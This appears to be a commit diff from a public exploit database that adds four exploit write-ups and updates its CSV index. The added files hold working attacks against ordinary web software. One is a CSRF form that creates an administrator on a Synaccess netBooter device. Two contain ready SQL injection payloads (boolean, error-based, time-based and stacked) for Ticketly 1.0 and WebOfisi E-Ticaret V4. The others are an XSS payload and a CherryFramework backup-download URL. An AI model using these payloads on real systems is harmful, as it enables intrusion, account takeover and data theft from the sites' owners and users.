DB: 2018-11-22

4 changes to exploits/shellcodes macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin) Ticketly 1.0 - 'name' SQL Injection WordPress CherryFramework Themes 3.1.4 - Backup File Download WebOfisi E-Ticaret V4 - 'urun' SQL Injection
2018-11-22 05:01:42 +00:00 · 2018-11-22 05:01:42 +00:00 · 7967efda82
commit 7967efda82
parent e3299ef341
5 changed files with 171 additions and 1 deletions
--- a/exploits/hardware/webapps/45894.txt
+++ b/exploits/hardware/webapps/45894.txt
@ -0,0 +1,28 @@
+# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Exploit Date: 2018-11-17
+# Vendor: Synaccess Networks Inc.
+# Product web page: https://www.synaccess-net.com
+# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
+# Tested on: Synaccess server
+# CVE: N/A
+# Advisory ID: ZSL-2018-5501
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php
+
+# Desc: The application interface allows users to perform certain
+# actions via HTTP requests without performing any validity checks
+# to verify the requests. This can be exploited to perform certai
+# actions with administrative privileges if a logged-in user visits
+# a malicious web site.
+
+<html>
+  <body>
+   <form action="http://10.0.0.19:8082/adm.htm" method="POST">
+     <input type="hidden" name="add1" value="Nimda" />
+     <input type="hidden" name="add2" value="123456" />
+     <input type="hidden" name="add3" value="123456" />
+     <input type="hidden" name="adm0" value="1" />
+     <input type="submit" value="Gou" />
+   </form>
+  </body>
+</html>
--- a/exploits/php/webapps/45895.txt
+++ b/exploits/php/webapps/45895.txt
@ -0,0 +1,70 @@
+# Exploit Title: Ticketly 1.0 – 'name' SQL Injection
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-11-19
+# Google Dork: N/A
+# Vendor: Abisoft (https://abisoftgt.net)
+# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
+# Affected Version: 1.0
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: Windows & Ubuntu
+# Tested on: Win10x64 & Kali Linux
+# 6. References:
+# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
+# CVE: N/A
+
+# 1. Technical Description:
+# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
+# resources through POST. This allows a attacker to read and modify
+# sensitive information from the database used by the application.
+
+# 2. Proof Of Concept (PoC):
+# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22&description=Test
+---
+
+# 2.2 In another request, add two ' to receive a code 200 OK
+---
+POST /ticketly/action/addproject.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/ticketly/projects.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Connection: close
+
+name=Test%22%22&description=Test
+---
+
+# 3. Payloads
+# 3.1 Payload (boolean-based blind)
+name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
+
+# 3.2 Payload (error-based)
+name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
+
+#3.3 Payload (AND/OR time-based blind)
+name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
+
+# 4. Vulnerables resources and parameters
+# /action/addproject.php (description, name, category_id and description)
+# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
+# /reports.php (kind_id y status_id)
--- a/exploits/php/webapps/45896.txt
+++ b/exploits/php/webapps/45896.txt
@ -0,0 +1,24 @@
+# Exploit Title: Wordpress CherryFramework Themes 3.1.4 - Backup File Download
+# Google Dork: inurl:/wp-content/themes/CherryFramework
+# Date: 2018-11-17
+# Exploit Author: b1p0l4r
+# Vendor Homepage: http://www.cherryframework.com/
+# Software Link: http://www.cherryframework.com/
+# Version: 3.x.x > 3.1.4
+# Tested on: Ubuntu 18.0.4.1
+# CVE : N/A
+
+# The CherryFramework Cherry theme 3.1.4 for WordPress allow
+# remote attackers to
+# obtain potentially sensitive information via
+# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
+# because it
+# offers the option of a ZIP archive containing the entire content of the wp-content/themes directory.
+
+# [PoC]
+# just open that files/link and then showing the popup for saving a .ZIP file
+# EXAMPLE LINK = 
+
+https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php 
+
+# IndoXploit, ZeroByte.ID, Eldersc0de Family, Exploiter Xero Team
--- a/exploits/php/webapps/45897.txt
+++ b/exploits/php/webapps/45897.txt
@ -0,0 +1,44 @@
+# Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection
+# Date: 2018-11-21
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://www.web-ofisi.com
+# Software Demo: http://demobul.net/eticaretv4/
+# Software Link: https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing
+# Version: v4.0
+# Category: Webapps
+# Tested on: XAMPP for Linux
+# Description: E-Ticaret v4 is a professional online shopping script with many features.
+# Vulnerabilities have been discovered during penetration testing.
+
+# PoC : SQLi :
+# Request : /eticaretv4/arama.html?kategori=20&urun=test
+
+# Parameter : urun (GET)
+# Type : boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload: 
+
+kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa
+
+# Type: error-based
+# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: 
+
+kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV
+
+# Type: stacked queries
+# Title: MySQL < 5.0.12 stacked queries (heavy query)
+# Payload: 
+
+kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: 
+
+kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb
+
+# PoC : XSS :
+# Payload :
+http://demobul.net/eticaretv4/arama.html?kategori=20&urun=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6194,7 +6194,7 @@ id,file,description,date,author,type,platform,port
 45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
 45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
 45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
-45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
+45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40396,3 +40396,7 @@ id,file,description,date,author,type,platform,port
 45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
 45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
 45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80
+45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware,
+45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
+45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
+45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80